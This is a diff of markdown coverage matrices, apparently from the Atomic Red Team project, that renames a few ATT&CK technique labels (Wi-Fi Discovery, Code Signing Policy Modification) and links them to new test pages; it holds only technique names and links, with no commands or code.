 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Unsecured Credentials](../../T1552/T1552.md) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Unsecured Credentials](../../T1552/T1552.md) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
@@ -35,7 +35,7 @@
 |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
-|  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [System Time Discovery](../../T1124/T1124.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
+|  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [System Time Discovery](../../T1124/T1124.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) |  |  |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) |  |  |  |  |  | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -17,7 +17,7 @@
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Archive Collected Data](../../T1560/T1560.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
@@ -70,7 +70,7 @@
 |  |  | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) |  |  |  |  |  |  |  |
 |  |  | [Create Account: Cloud Account](../../T1136.003/T1136.003.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rogue Domain Controller](../../T1207/T1207.md) |  |  |  |  |  |  |  |
-|  |  | [Account Manipulation](../../T1098/T1098.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Account Manipulation](../../T1098/T1098.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) |  |  |  |  |  |  |  |
 |  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) |  |  |  |  |  |  |  |
 |  |  | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) |  |  |  |  |  |  |  |
@@ -15,7 +15,7 @@
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
